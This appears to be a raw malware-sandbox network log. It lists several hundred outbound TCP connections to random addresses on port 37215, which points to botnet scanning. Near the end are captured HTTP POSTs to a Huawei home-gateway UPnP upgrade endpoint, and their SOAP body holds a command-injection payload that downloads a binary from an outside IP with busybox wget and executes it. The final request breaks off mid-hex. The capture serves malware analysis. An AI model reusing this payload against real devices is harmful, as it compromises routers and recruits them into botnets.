              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.59.18.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.144.202.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.218.189.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.163.9.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.173.104.81:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.203.1.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.159.144.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.239.140.38:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.183.149.52:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.236.127.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.170.113.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.169.18.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.146.2.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.218.52.85:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.230.133.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.30.64.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.17.3.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.170.50.63:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.242.4.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.167.202.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.153.125.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.9.116.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.173.56.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.90.134.69:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.241.117.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.79.25.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.233.204.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.214.49.146:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.78.220.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.125.118.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.179.68.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.241.157.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.82.86.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.118.26.59:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.16.169.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.63.78.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.90.213.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.40.15.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.100.143.165:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.209.222.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.127.209.214:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.101.154.57:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.40.252.52:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.223.225.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.105.240.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.217.26.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.184.152.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.75.242.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.253.30.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.118.70.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.220.112.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.79.128.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.125.252.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.150.191.19:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.145.76.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.195.121.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.90.19.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.81.189.196:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.174.95.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.190.32.52:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.55.222.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.12.177.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.75.34.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.238.82.31:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.69.39.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.42.240.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.225.41.128:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.109.132.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.199.57.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.151.150.108:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.103.96.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.132.135.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.54.18.203:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.209.130.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.106.81.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.240.33.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.79.240.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.118.202.33:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.35.46.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.68.61.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.254.160.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.2.199.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.163.174.182:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.94.98.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.120.151.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.193.31.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.242.88.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.242.147.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.206.114.165:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.187.18.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.71.13.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.255.184.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.232.129.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.165.251.59:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.67.137.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.3.155.245:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.70.96.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.62.254.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.233.196.11:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.200.40.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.29.2.221:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.4.199.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.7.172.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.169.18.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.152.32.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.188.167.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.238.105.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.5.245.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.44.194.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.51.19.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.142.246.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.162.138.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.234.124.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.153.156.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.77.98.128:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.125.94.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.215.48.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.95.203.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.96.75.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.194.134.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.140.8.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.223.21.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.64.125.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.73.64.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.253.210.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.230.251.239:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.171.110.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.45.139.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.191.128.245:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.126.206.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.178.116.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.86.22.172:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.179.87.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.91.103.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.31.222.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.32.14.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.246.191.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.24.255.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.205.127.172:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.66.54.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.107.254.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.99.55.238:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.29.102.33:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.56.18.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.67.94.82:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.41.14.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.91.0.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.204.40.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.133.82.82:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.194.164.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.55.216.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.45.112.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.237.209.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.208.73.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.32.219.129:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.186.235.105:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.150.115.165:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.31.94.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.207.125.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.5.87.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.245.107.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.215.217.196:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.82.188.129:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.50.205.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.146.204.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.222.60.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.103.106.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.201.47.239:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.198.206.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.72.85.85:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.142.47.147:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.51.142.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.177.185.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.172.50.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.164.200.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.9.115.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.240.203.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.203.89.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.6.191.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.228.152.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.109.220.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.127.95.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.186.124.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.171.136.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.114.184.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.176.102.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.127.58.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.206.129.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.229.11.114:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.131.20.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.249.224.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.0.6.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.156.101.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.197.156.52:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.166.52.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.35.70.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.161.71.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.197.219.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.249.185.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.252.234.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.17.222.182:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.209.66.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.57.6.200:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.162.43.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.176.59.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.31.44.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.157.30.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.73.74.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.95.183.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.175.159.92:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.156.164.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.133.20.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.79.196.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.115.121.126:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.196.24.31:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.117.2.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.106.22.43:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.151.198.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.111.72.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.34.98.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.92.118.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.191.29.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.184.249.164:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.191.151.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.13.211.60:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.144.253.201:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.206.156.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.36.87.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.170.107.85:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.36.214.252:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.91.25.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.191.172.239:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.6.119.126:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.188.122.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.99.92.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.110.172.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.199.241.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.5.233.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.183.226.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.1.96.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.104.49.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.136.1.23:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.110.235.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.120.120.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.9.152.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.67.208.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.163.19.38:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.254.7.240:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.194.42.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.27.172.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.146.139.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.216.174.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.25.88.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.114.75.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.78.84.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.2.77.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.144.75.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.19.206.11:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.225.90.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.163.120.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.97.235.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.108.0.213:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.158.74.89:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.181.106.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.193.145.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.32.217.85:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.41.90.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.149.143.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.90.81.38:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.150.120.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.165.184.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.231.221.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.180.121.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.103.112.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.161.246.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.168.244.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.10.35.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.33.22.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.245.125.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.183.44.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.62.240.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.43.103.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.60.223.213:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.114.219.227:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.190.225.184:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.247.50.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.143.112.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.93.6.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.27.28.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.139.141.116:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.6.234.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.143.117.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.163.75.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.74.200.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.232.244.213:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 156.96.237.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 41.233.254.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.109.241.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.5.187.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.123.237.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:60650 -> 197.36.25.212:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 